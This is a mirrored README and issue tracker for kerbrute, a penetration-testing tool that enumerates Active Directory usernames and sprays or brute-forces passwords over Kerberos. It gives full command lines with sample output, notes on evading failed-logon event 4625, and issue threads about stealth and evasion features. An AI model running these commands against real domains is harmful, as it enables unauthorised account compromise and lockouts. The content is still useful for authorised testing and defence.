Giter Site home page Giter Site logo

kerbrute's Introduction

Kerbrute

CircleCI

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

Grab the latest binaries from the releases page to get started.

Background

This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this.

Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier since pre-authentication failures do not trigger that "traditional" An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller)

For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD)

Usage

Kerbrute has three main commands:

  • bruteuser - Bruteforce a single user's password from a wordlist
  • bruteforce - Read username:password combos from a file or stdin and test them
  • passwordspray - Test a single password against a list of users
  • userenum - Enumerate valid domain usernames via Kerberos

A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.

By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.

Output is logged to stdout, but a log file can be specified with -o.

By default, failures are not logged, but that can be changed with -v.

Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.

The help command can be used for more information

$ ./kerbrute -h

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (bc1d606) - 11/15/20 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string          The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int          Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string      The full domain to use (e.g. contoso.com)
      --downgrade          Force downgraded encryption type (arcfour-hmac-md5)
      --hash-file string   File to save AS-REP hashes to (if any captured), otherwise just logged
  -h, --help               help for kerbrute
  -o, --output string      File to write logs to. Optional.
      --safe               Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int        Threads to use (default 10)
  -v, --verbose            Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

User Enumeration

To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.

root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:28:04 >  Using KDC(s):
2019/03/06 21:28:04 >   pdc01.lab.ropnop.com:88

2019/03/06 21:28:04 >  [+] VALID USERNAME:       [email protected]
2019/03/06 21:28:04 >  [+] VALID USERNAME:       [email protected]
2019/03/06 21:28:04 >  Done! Tested 1001 usernames (2 valid) in 0.425 seconds

Password Spray

With passwordspray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this does will increment the failed login count and lock out accounts. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:37:29 >  Using KDC(s):
2019/03/06 21:37:29 >   pdc01.lab.ropnop.com:88

2019/03/06 21:37:35 >  [+] VALID LOGIN:  [email protected]:Password123
2019/03/06 21:37:37 >  [+] VALID LOGIN:  [email protected]:Password123
2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds

Brute User

This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:38:24 >  Using KDC(s):
2019/03/06 21:38:24 >   pdc01.lab.ropnop.com:88

2019/03/06 21:38:27 >  [+] VALID LOGIN:  [email protected]:Summer2017
2019/03/06 21:38:27 >  Done! Tested 1001 logins (1 successes) in 2.711 seconds

Brute Force

This mode simply reads username and password combinations (in the format username:password) from a file or from stdin and tests them with Kerberos PreAuthentication. It will skip any blank lines or lines with blank usernames/passwords. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

$ cat combos.lst | ./kerbrute -d lab.ropnop.com bruteforce -

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 05/11/19 - Ronnie Flathers @ropnop

2019/05/11 18:40:56 >  Using KDC(s):
2019/05/11 18:40:56 >   pdc01.lab.ropnop.com:88

2019/05/11 18:40:56 >  [+] VALID LOGIN:  [email protected]:Password1234
2019/05/11 18:40:56 >  Done! Tested 7 logins (1 successes) in 0.114 seconds

Installing

You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:

$ go get github.com/ropnop/kerbrute

With the repository cloned, you can also use the Make file to compile for common architectures:

$ make help
help:            Show this help.
windows:  Make Windows x86 and x64 Binaries
linux:  Make Linux x86 and x64 Binaries
mac:  Make Darwin (Mac) x86 and x64 Binaries
clean:  Delete any binaries
all:  Make Windows, Linux and Mac x86/x64 Binaries

$ make all
Done.
Building for windows amd64..
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
Done.

$ ls dist/
kerbrute_darwin_386        kerbrute_linux_386         kerbrute_windows_386.exe
kerbrute_darwin_amd64      kerbrute_linux_amd64       kerbrute_windows_amd64.exe

Credits

Huge shoutout to jcmturner for his pure Go implementation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project and very well documented. Couldn't have done any of this without that project.

Shoutout to audibleblink for the suggestion and implementation of the delay option!

kerbrute's People

Contributors

audibleblink avatar ropnop avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

gavz theotherside johnjohnsp1 raystyle vysecurity 1337g keystroke95 meni0n qsdj 5up3rc bigbrobro a-min3 johndoex1 killvxk paralax kicany reallws marciopocebon nag1bat0r achadigan minkione kurtdegreeff dennyx docsmooth hansesecure rajivraj h4xl0r zshell mlynchcogent attackgithub hosakacorp malyshusness triplekill taisonb incredibleindishell t0mcat3r sts0mrg0 imulmul nothingcw rmusser01 tquentin slooppe topotam jonz-secops audibleblink modulexcite pwnfun addenial waltersagehorn-praetorian acknowledgehim cream-sec forkarepo startagain2016 an4kein gitakaal rahmiy pixelza zflemingg1 red-infosec ferpalma21 princejnr 5l1v3r1 shac0 j1mm3br0dy lager1 ghostaatrox shad0w008 basilthomasev dowdyph0 jesusabascal digitalarche holajiawei dannymas mdalemran15 mrcraniums chanpu9 aurorafang mmg1 derco0n daddyty612 hackalicious 814561039 robsauce kildonan5 amatol15 tripmahi epicn1337 a7t0fwa7 papadope-zz kaulanab mewbak zorroroot aqqdgyz berkotako k0bee merx1030 marnick39 come2darkside fdlucifer quinn-yan

kerbrute's Issues

Parsing Flags Incorrectly

Pulling the latest kerbrute version (untagged):
./kerbrute passwordspray --dc -d -output Summer2020.txt valid.txt Summer2020

Error:
You must specify a password to spray with, or --user-as-pass

[Feature Request] Timeout argument.

Awesome tool.
Would love to have a timeout feature, was in a situation where the DC was barely reachable but still up and responding, kerbrute was dropping the passwordspraying attempt after a small window, tried to find a way to make the timeout infinite but could not find it. That would solve my problem and pretty sure will be useful for others.
Cheers.

Password spray attempt increase badPwd counter by 2

Hi,

When using this tool I noticed that the badPwdCount counter increases by 2 on each password spray attempt against a user. Could you please confirm if this is a bug?

I've attached a screenshot which compares the results to cme.

image

[Feature Request] Socks proxy support

Someone on Twitter mentioned that kerbrute doesn't work with proxychains. Would be cool to add a proxy option to kerbrute (not sure how well it would, but worth trying)

Expired passwords are treated as failures

Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (23) KDC_ERR_KEY_EXPIRED Password has expired; change password to reset

KRBERR_KEY_EXPIRED should be treated as a success - appears to be that in session/session.go:TestLogin you're treating all errors as failures:
if err != nil {
return false, err
}

I think 23 should be a success? or configurable as success?

KRB_AP_ERR_SKEW treated as login failure

Hey,

i just spend way too much time getting some creds because of this lil error (which is only shown with -v).

2020/04/18 14:57:24 >  [!] XXXXX:XXXXX - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (37) KRB_AP_ERR_SKEW Clock skew too great

As far as i know, this error response only actually happens with a correct password. I think either showing the error (without -v so you can see it in all the noise) or just classifying it as a valid password would be very preferable.

Thancc

Make problem

Hello. I tried making all but I got this message;
What can I do for this problem?
Thanks

@kali]─[/opt/kerbrute]
└──╼ $make all
Done.
Building for windows amd64..
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Building for windows 386..
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Done.
Building for linux amd64...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Building for linux 386...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Done.
Building for mac amd64...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Building for mac 386...
main.go:4:2: cannot find package "github.com/ropnop/kerbrute/cmd" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/cmd (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/cmd (from $GOPATH)
main.go:5:2: cannot find package "github.com/ropnop/kerbrute/util" in any of:
/usr/lib/go-1.11/src/github.com/ropnop/kerbrute/util (from $GOROOT)
/home/x23_11/go/src/github.com/ropnop/kerbrute/util (from $GOPATH)
Done.

[Feature Request] Semi-Safe mode

Extend the safe mode in a new semi-safe mode to abort after N account lockouts. Essentially, don't abort after the first lockout (probably not our fault), but instead after some user supplied number (probably our fault).

This is primarily for password sprays, but couldn't hurt to have globally.

[feature request] decoy

hey there,
first of all, thanks for this great tool
I'm a red team guy and I use this tool to measure the blueteam response.
I wonder if it would be possible to add decoy mode, in other words, send spoofed ip requests like nmap does.

Thanks!

Error ensure resolv.conf

kerbrute userenum --dc=192.168.10.2 -d=tester.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -v | grep 'VALID'

[-] Error: [Error Connection error (192.168.10.2:88)] [Error110] Connection timed out, ensure /etc/resolv.conf points to correct DC

Error execution

Hello,

when I run kerbrute userenum I have this error:

kerbrute userenum   -domain domain1.local -dc DC.domain1.local -users /usr/share/wordlists/kerberos-A-Z.Surnames.txt


kerbrute: error: unrecognized arguments: userenum

I don't understand this error, Can anyone help me ?

A greeting and thanks

Expired accounts are reported as locked out

I noticed that a lot of accounts are reported as locked out, which isn't really possible with a lockout duration of 30 minutes. I checked a few accounts and noticed that they have expired months or years ago. This makes the use of --safe pretty pointless. I guess the Kerberos error code ERR_CLIENT_REVOKED doesn't really tell us why the credentials have been revoked, so there is not much that can be done about this. But it could be mentioned in the console output that account isn't necessarily locked, but could also be expired (or possibly disabled?).

panic: runtime error: invalid memory address or nil pointer dereference

Hi, i have an issue running kerbrute, here is my output

└─$ ./kerbrute userenum --dc 10.10.190.154 -d spookysec.local ~/userlist.txt

__             __               __

/ /_____ / / _______ / /
/ //_/ _ / / __ / / / / / __/ _
/ ,< / __/ / / // / / / // / // __/
//||_// /.// _,/_/___/

Version: v1.0.0 (191510e) - 03/16/23 - Ronnie Flathers @ropnop

2023/03/16 13:52:24 > Using KDC(s):
2023/03/16 13:52:24 > 10.10.190.154:88

2023/03/16 13:52:24 > [+] VALID USERNAME: [email protected]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6849d9]

goroutine 24 [running]:
github.com/ropnop/kerbrute/session.KerbruteSession.HandleKerbError(0x7ffd2e0162a6, 0xf, 0xc0000c0500, 0xf, 0xc0001da540, 0xc0000be100, 0x80, 0xc00013a000, 0x0, 0x0, ...)
/go/src/github.com/ropnop/kerbrute/session/session.go:110 +0x29
github.com/ropnop/kerbrute/cmd.testUsername(0x780160, 0xc0000c81c0, 0xc0000154b0, 0x9)
/go/src/github.com/ropnop/kerbrute/cmd/worker.go:84 +0x2ca
github.com/ropnop/kerbrute/cmd.makeEnumWorker(0x780160, 0xc0000c81c0, 0xc000266000, 0xc0000c0c90)
/go/src/github.com/ropnop/kerbrute/cmd/worker.go:50 +0x14a
created by github.com/ropnop/kerbrute/cmd.userEnum
/go/src/github.com/ropnop/kerbrute/cmd/userenum.go:46 +0x17c

Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated

I know this error was posted before but i can't seem to figure out how to fix it.
When trying to userenum (I'm doing the Attacking Kerberos Room on THM atm) it doesn't work so I tried -v to see what was going on.
For every single user checked it gave me this error message: "[Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated"
I don't know how to fix it.
Here might be some steps on how to replicate it (I'm using a Kali Linux VM):
Download kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt

Edit: Only workaround i found was editing /etc/hosts with "ip CONTROLLER.local"

ARM version?

I've got a Mac M1 so could we get an ARM version of this?

Kerbrute erroring out on some accounts

Receiving the following error on some specific accounts when password spraying - believe this may point towards some protection in client environment, but haven't yet confirmed.

[Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type

Would it be possible to have the script skip this error, try a different (higher-security?) encryption type, or otherwise log the accounts as being in a different state, and proceed with the rest of the spray?

Scan for user=password

Every onsite pentest I have faced so far, at least a couple of users had been set with username=password.
I think it could be helpful to add to the bruteuser module some kind of username=password.

Error: accepts 1 arg(s), received 2

When using the following syntax: ./kerbrute userenum -dc IPADDR /path/to/text/file

I'm receiving the error mentioned in the title. Did some googling and I can't seem to find anything to resolve what might be causing this problem. Additionally no one has raised an issue related to it yet.

Bug - kerbrute passwordspray

I have a text file with usernames. I supply kerbrute with the usernames and kerbrute will run through a portion and then stop. why is this?
ex - 100 usernames
only 10 usernames are run

kerbrute not working with aarch64

I have kali installed on UTM kali version is
─$ uname -amr
Linux kali 5.16.0-kali1-arm64 #1 SMP Debian 5.16.7-2kali1 (2022-02-10) aarch64 GNU/Linux

1.When running amd based elf file it throws error.

┌──(kali㉿kali)-[~/Downloads/tools/kerbrute]
└─$ ./kerbrute_linux_amd64
zsh: exec format error: ./kerbrute_linux_amd64

2. When running kerbrute.py its running fine but options like userenum doest seems to be in list.

python3 kerbrute.py -h
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS) [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip <ip_address>] [-threads THREADS] [-outputfile OUTPUTFILE] [-outputusers OUTPUTUSERS] [-no-save-ticket]

options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-user USER User to perform bruteforcing
-users USERS File with user per line
-password PASSWORD Password to perform bruteforcing
-passwords PASSWORDS File with password per line
-domain DOMAIN Domain to perform bruteforcing
-dc-ip <ip_address> IP Address of the domain controller
-threads THREADS Number of threads to perform bruteforcing. Default = 1
-outputfile OUTPUTFILE
File to save discovered user:password
-outputusers OUTPUTUSERS
File to save discovered users
-no-save-ticket Do not save retrieved TGTs with correct credentials

Please help this tool is very essential for me how can i make kerbrute_amd_64 work in my arm based kali

or is there any binary available for arm.

panic: runtime error: invalid memory address or nil pointer dereference

Hello,
When I use the module userenum, an error is raised when it tries a login with the flag Do not require Kerberos preauthentication set.

Example with only one account with the flag within the list

# ./kerbrute_linux_amd64 userenum --dc 172.16.0.1 -d xxxx.org user 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.0 (191510e) - 03/24/19 - Ronnie Flathers @ropnop

2019/03/24 18:32:04 >  Using KDC(s):
2019/03/24 18:32:04 >  	172.16.0.1:88

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6849d9]

goroutine 15 [running]:
github.com/ropnop/kerbrute/session.KerbruteSession.HandleKerbError(0x7ffc3a555751, 0xa, 0xc000016580, 0xa, 0xc00017e540, 0xc00001c180, 0x70, 0xc0000e0000, 0x0, 0x0, ...)
	/go/src/github.com/ropnop/kerbrute/session/session.go:110 +0x29
github.com/ropnop/kerbrute/cmd.testUsername(0x780160, 0xc000052200, 0xc000016d98, 0x3)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:84 +0x2ca
github.com/ropnop/kerbrute/cmd.makeEnumWorker(0x780160, 0xc000052200, 0xc000200060, 0xc000016d80)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:50 +0x14a
created by github.com/ropnop/kerbrute/cmd.userEnum
	/go/src/github.com/ropnop/kerbrute/cmd/userenum.go:46 +0x17c

Example with a mixed list (here two accounts)

# ./kerbrute_linux_amd64 userenum --dc 172.16.0.1 -d xxxxx.org user 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.0 (191510e) - 03/24/19 - Ronnie Flathers @ropnop

2019/03/24 17:47:58 >  Using KDC(s):
2019/03/24 17:47:58 >  	172.16.0.1:88

2019/03/24 17:47:58 >  [+] VALID USERNAME:	 [email protected]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6849d9]

goroutine 9 [running]:
github.com/ropnop/kerbrute/session.KerbruteSession.HandleKerbError(0x7ffeea75e751, 0xa, 0xc000016580, 0xa, 0xc00017e540, 0xc00001c180, 0x70, 0xc0000e0000, 0x0, 0x0, ...)
	/go/src/github.com/ropnop/kerbrute/session/session.go:110 +0x29
github.com/ropnop/kerbrute/cmd.testUsername(0x780160, 0xc000052200, 0xc000016db0, 0x3)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:84 +0x2ca
github.com/ropnop/kerbrute/cmd.makeEnumWorker(0x780160, 0xc000052200, 0xc000200060, 0xc000016d80)
	/go/src/github.com/ropnop/kerbrute/cmd/worker.go:50 +0x14a
created by github.com/ropnop/kerbrute/cmd.userEnum
	/go/src/github.com/ropnop/kerbrute/cmd/userenum.go:46 +0x17c

As you can see, the module works perfectly against "normal" accounts but not with a Do not require Kerberos preauthentication one.

Tested with the release version of Kerbrute against Windows Server 2012R2

🌻

facilitating slower enumeration

In your opinion, if one was to implement the ability to go slow, what would be your preference be for the interface?:

  1. Allow subcommands to also accept one-off entries, then a user can bash loop around kerbrute
while read name; do
sleep 5
kerbrute userenum --dc kdc.site.com -d site.com --username "${name}"
done < names.txt
  1. Add something like --delay <seconds> flag
kerbrute --delay 5 userenum --dc kdc.site.com -d site.com names.txt
  1. Do nothing and rely on bash trickery:
while read name; do
sleep 5
kerbrute userenum --dc kdc.site.com -d site.com <(<<<"${name}")
done < names.txt

[Feature Request] Pass the Hash Support

It would be nice to have the ability to spray user accounts with NTLM Hashes. The two main use cases I imagine for this is:

  • Pulling an NTLM Hash off a local workstation, then spraying AD to look for password re-use
  • Testing passwords from domain controller backups (old copies of NTDS.DIT).

Currently, this can be done with https://github.com/3gstudent/pyKerbrute, but is an extremely hacky solution using Python2.

Kerbrute running into Encoding Error

Hi!

I'm walking about the attacktive directory room on THM, and in the section about kerbrute, I'm getting these outputs:

root@ip-[redacted]:~# sudo ./kerbrute userenum -v --dc spookysec.local -d spookysec.local userlist.txt -t 10

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/04/21 - Ronnie Flathers @ropnop

2021/12/04 20:06:34 >  Using KDC(s):
2021/12/04 20:06:34 >  	spookysec.local:88

2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated

I've had this first come up on the AttackBox and was able to replicate on a Kali machine.

I don't know if that's on your end, but good luck!

Realm gets uppercase'd which doesn't work with Linux Kerberos 5 implementation

Hi, i tested this tool against a Linux DC running Kerberos and OpenLDAP ( https://ubuntu.com/server/docs/service-kerberos-with-openldap-backend ) and noticed that all attempts failed due to the realm getting uppercased here from the domain name. While the Microsoft implementation is case insensitive (as all MS things :D), the Linux one is definitely case sensitive, meaning that a -d example.com argument will result in EXAMPLE.COM, which fails.

I think that uppercasing can just be removed, in which case it'll work for both implementation (and the user can just pass whatever case they want).

Typo

Under Use in README.md you wrote "Kerbrute has three main commands:" but you list four.
bruteuser - Bruteforce a single user's password from a wordlist
bruteforce - Read username:password combos from a file or stdin and test them
passwordspray - Test a single password against a list of users
userenum - Enumerate valid domain usernames via Kerberos

AS_REQ PAData required

Hi,

Great tool but I keep getting the following error when attempting to bruteforce passwords:

[Root cause: Encrypting_Error] KRBMessage_Handling_Error: AS Exchange Error: failed setting AS_REQ PAData for pre-authentication required < Encrypting_Error: error getting etype for pre-auth encryption < Encrypting_Error: error creating etype: unknown or unsupported EType: 0

Could be related to: jcmturner/gokrb5#157

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.